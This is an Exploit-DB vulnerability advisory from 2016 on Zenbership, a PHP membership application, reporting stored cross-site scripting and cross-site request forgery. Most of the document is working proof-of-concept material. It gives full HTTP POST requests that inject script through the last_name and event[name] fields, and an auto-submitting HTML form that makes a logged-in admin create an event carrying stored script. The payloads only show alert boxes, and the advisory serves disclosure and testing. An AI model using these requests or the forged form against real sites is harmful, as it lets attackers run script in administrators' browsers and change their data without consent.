Zenbership 107 - Multiple Vulnerabilities

EDB-ID:

40620

CVE:

N/A


Author:

Besim

Type:

webapps


Platform:

PHP

Date:

2016-10-23


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux and pass the exam to become an Offensive Security Certified Professional (OSCP). All new content for 2020.

GET CERTIFIED

1. ADVISORY INFORMATION
========================================
Title: Zenbership (latest version) - Multiple Vulnerabilities
Application: Zenbership
Class: Sensitive Information disclosure
Versions Affected:  <= latest version )
Vendor URL: https://www.zenbership.com/
Software URL: https://www.zenbership.com/Download
Bugs:  CSRF / Persistent Cross Site Scripting
Date of found:  23.10.2016
Author: Besim
 
 
2.CREDIT
========================================
Those vulnerabilities was identified by Besim ALTINOK  and Mrs. Meryem AKDOĞAN

 
3. VERSIONS AFFECTED
========================================
 <= latest version
 

 
4. TECHNICAL DETAILS & POC
========================================
 

PR1 - Stored Cross Site Scripting
========================================

1 ) Admin login admin panel
2 ) Create contact form for guest (http://site_name/path/register.php?action=reset&id=3c035c2)
3 ) Attacker enter xss payload to last name input
4 ) XSS Payload run when admin looked contact page (http://site_name/path/admin/index.php?l=contacts)
5 ) Vulnerability Parameter and Payload : &last_name=<Script>alert('ExploitDB')</Script>

## HTTP Request ##

POST /zenbership/pp-functions/form_process.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://site_name/zenbership/register.php?action=reset&id=3c035c2
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44; zen_cart=WJL-1484545251; zen_0176e737b450bbd83f5fc1066=253782
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 153

 - POST DATA

page=1
&session=zen_0176e737b450bbd83f5fc1066
&first_name=Besim
&last_name=<Script>alert('ExploitDB')</Script>
&email=exploit@yopmail.com


PR2 - CSRF
========================================

1 ) Attacker can add new event with xss payload (stored)
 - File : admin/cp-functions/event-add.php

HTTP Request and CSRF PoC
=========================


## HTTP Request ##

POST /zenbership/admin/cp-functions/event-add.php HTTP/1.1
Host: site_name
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:43.0) Gecko/20100101 Firefox/43.0 Iceweasel/43.0.4
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://site_name/zenbership/admin/index.php?l=events
Content-Length: 1206
Cookie: phpwcmsBELang=en; PHPSESSID=8jvb8kr06gorp07f62hqta9go5; browserupdateorg=pause; __utma=1.252344004.1477173994.1477173994.1477206731.2; __utmc=1; __utmz=1.1477173994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); zenseshold=2bdeaefcdc97966f9d8df00752a5cefd; zen_cart=LKQ-4724862238; zen_admin_ses=b2d51bb8f8b895f751dee72db8889bce-470476f3e9d2b2b0d3465b82ce6cd889-7ecb9b7770668e2ecd0a049b60576e44
Connection: close


 - POST DATA


id=JFW996951
&ext=
&edit=0
&event[id]=JFW996951&event[status]=1
&event[name]=<Script>alert('Meryem-ExploitDB');</Script>
&event[tagline]=Meryem&event[description]=<p>Meryem AKDOGAN</p>
&event[post_rsvp_message]=<p>Meryem AKDOGAN</p>
&event[calendar_id]=1
&event[custom_template]=
&tags=
&event[starts]=2016-10-26 00:00:00
&event[ends]=2016-10-28 00:00:00
&event[start_registrations]=2016-10-24 00:00:00
&event[close_registration]=&event[early_bird_end]=
&event[online]=0&event[location_name]=Turkey
&event[url]=&event[address_line_1]=
&event[address_line_2]=&event[city]=
&event[state]=&event[zip]=
&event[country]=
&event[phone]=
&limit_attendees_dud=0
&event[max_rsvps]=
&event[members_only_view]=0
&event[members_only_rsvp]=0
&event[allow_guests]=1
&event[max_guests]=1
&form[col2][Account Overview]=section
&form[col2][company_name]=1
&form[col2][address_line_1]=0
&form[col2][address_line_2]=0
&form[col2][city]=0
&form[col2][state]=0
&form[col2][zip]=0
&form[col2][country]=0
&form[col2][url]=0



## CSRF PoC ##

<html>
  <!-- CSRF PoC -->
  <body>
    <form action="http://site_name/path/admin/cp-functions/event-add.php" method="POST">
      <input type="hidden" name="id" value="OXH978786" />
      <input type="hidden" name="ext" value="" />
      <input type="hidden" name="edit" value="0" />
      <input type="hidden" name="event&#91;id&#93;" value="OXH978786" />
      <input type="hidden" name="event&#91;status&#93;" value="1" />
      <input type="hidden" name="event&#91;name&#93;" value="<script>alert&#40;&apos;Meryem&#45;ExploitDB&apos;&#41;&#59;<&#47;Script>" />
      <input type="hidden" name="event&#91;tagline&#93;" value="meryem" />
      <input type="hidden" name="event&#91;description&#93;" value="<p>Meryem&#32;AKDOGAN<&#47;p>&#13;&#10;" />
      <input type="hidden" name="event&#91;post&#95;rsvp&#95;message&#93;" value="<p>Meryem&#32;AKDOGAN<&#47;p>&#13;&#10;" />
      <input type="hidden" name="event&#91;calendar&#95;id&#93;" value="1" />
      <input type="hidden" name="event&#91;custom&#95;template&#93;" value="" />
      <input type="hidden" name="tags" value="meryem" />
      <input type="hidden" name="event&#91;starts&#93;" value="2016&#45;10&#45;26&#32;00&#58;00&#58;00" />
      <input type="hidden" name="event&#91;ends&#93;" value="2016&#45;10&#45;28&#32;00&#58;00&#58;00" />
      <input type="hidden" name="event&#91;start&#95;registrations&#93;" value="2016&#45;10&#45;24&#32;00&#58;00&#58;00" />
      <input type="hidden" name="event&#91;close&#95;registration&#93;" value="" />
      <input type="hidden" name="event&#91;early&#95;bird&#95;end&#93;" value="" />
      <input type="hidden" name="event&#91;online&#93;" value="0" />
      <input type="hidden" name="event&#91;location&#95;name&#93;" value="Turkey" />
      <input type="hidden" name="event&#91;url&#93;" value="" />
      <input type="hidden" name="event&#91;address&#95;line&#95;1&#93;" value="" />
      <input type="hidden" name="event&#91;address&#95;line&#95;2&#93;" value="" />
      <input type="hidden" name="event&#91;city&#93;" value="" />
      <input type="hidden" name="event&#91;state&#93;" value="" />
      <input type="hidden" name="event&#91;zip&#93;" value="" />
      <input type="hidden" name="event&#91;country&#93;" value="" />
      <input type="hidden" name="event&#91;phone&#93;" value="" />
      <input type="hidden" name="limit&#95;attendees&#95;dud" value="0" />
      <input type="hidden" name="event&#91;max&#95;rsvps&#93;" value="" />
      <input type="hidden" name="event&#91;members&#95;only&#95;view&#93;" value="0" />
      <input type="hidden" name="event&#91;members&#95;only&#95;rsvp&#93;" value="0" />
      <input type="hidden" name="event&#91;allow&#95;guests&#93;" value="1" />
      <input type="hidden" name="event&#91;max&#95;guests&#93;" value="1" />
      <input type="hidden" name="form&#91;col2&#93;&#91;Account&#32;Overview&#93;" value="section" />
      <input type="hidden" name="form&#91;col2&#93;&#91;company&#95;name&#93;" value="1" />
      <input type="hidden" name="form&#91;col2&#93;&#91;address&#95;line&#95;1&#93;" value="0" />
      <input type="hidden" name="form&#91;col2&#93;&#91;address&#95;line&#95;2&#93;" value="0" />
      <input type="hidden" name="form&#91;col2&#93;&#91;city&#93;" value="0" />
      <input type="hidden" name="form&#91;col2&#93;&#91;state&#93;" value="0" />
      <input type="hidden" name="form&#91;col2&#93;&#91;zip&#93;" value="0" />
      <input type="hidden" name="form&#91;col2&#93;&#91;country&#93;" value="0" />
      <input type="hidden" name="form&#91;col2&#93;&#91;url&#93;" value="0" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>